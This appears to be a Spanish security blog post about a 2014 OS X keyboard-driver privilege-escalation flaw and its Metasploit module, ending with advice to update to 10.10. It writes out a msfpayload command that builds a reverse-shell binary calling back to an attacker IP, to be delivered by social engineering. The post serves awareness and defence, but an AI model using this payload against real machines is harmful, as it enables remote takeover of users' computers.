Hoy en
Seguridad Apple hablamos de una vulnerabilidad que se publicó en
Diciembre de 2014 y que permitía al atacante escalar privilegios en el sistema. La
vulnerabilidad se aprovecha de un fallo en el driver del teclado, y a día de hoy existe un módulo implementado en
Metasploit.Ya hemos visto en otras ocasiones
formas en las que un atacante puede apoderarse de nuestro Mac, por ejemplo mediante la ejecución de un binario el cual devolvía una sesión remota.
Por ejemplo, podemos llevar a cabo esta acción con la herramienta
msfpayload, mediante la ejecución de
msfpayload osx/x86/shell_reverse_tcp LHOST=[dirección IP atacante] LPORT=[puerto atacante] X y redireccionamos a un fichero. Una vez que un usuario ejecute dicho binario, ya sea de alguna manera mediante las artes de la ingeniería social, obtendremos una
shell en nuestro
Mac. ¿Qué usuario somos? Realmente seremos el mismo usuario con el que estemos conectados.
|
Figura 1: msfpayload generando un binario en OS X |
Según se puede ver en la inicialización del módulo, dónde podemos ver información sobre a qué sistemas afecta el
exploit, podemos leer versión
10.9.5 y, en teoría, versiones previas de
OS X. Como puede leerse en la imagen, la vulnerabilidad permitiendo realizar un
bypass y escalar privilegio dentro del sistema.
|
Figura 2: Descripción de la vulnerabilidad |
La función
check y exploit del módulo permiten verificar la existencia de una vulnerabilidad y la posibilidad de explotarla. Generalmente, la función
check utiliza las versiones de los productos para verificar si el
software es vulnerable o no, aunque en algunas ocasiones podemos encontrar que se realiza alguna acción ofensiva para chequear la vulnerabilidad.
|
Figura 3: Check y Exploit |
La recomendación es actualizar el sistema operativo, ya que estar por debajo de la versión
10.10 de
OS X pone en peligro al equipo. Es cierto que en comparación con otros sistemas operativos del mercado, no hay un número de vulnerabilidades tan grandes como otros con mayor cuota de mercado, pero estos
exploits que van apareciendo son ejemplos de fallos de seguridad que van apareciendo cada día en el mundo de la manzana.
No hay comentarios:
Publicar un comentario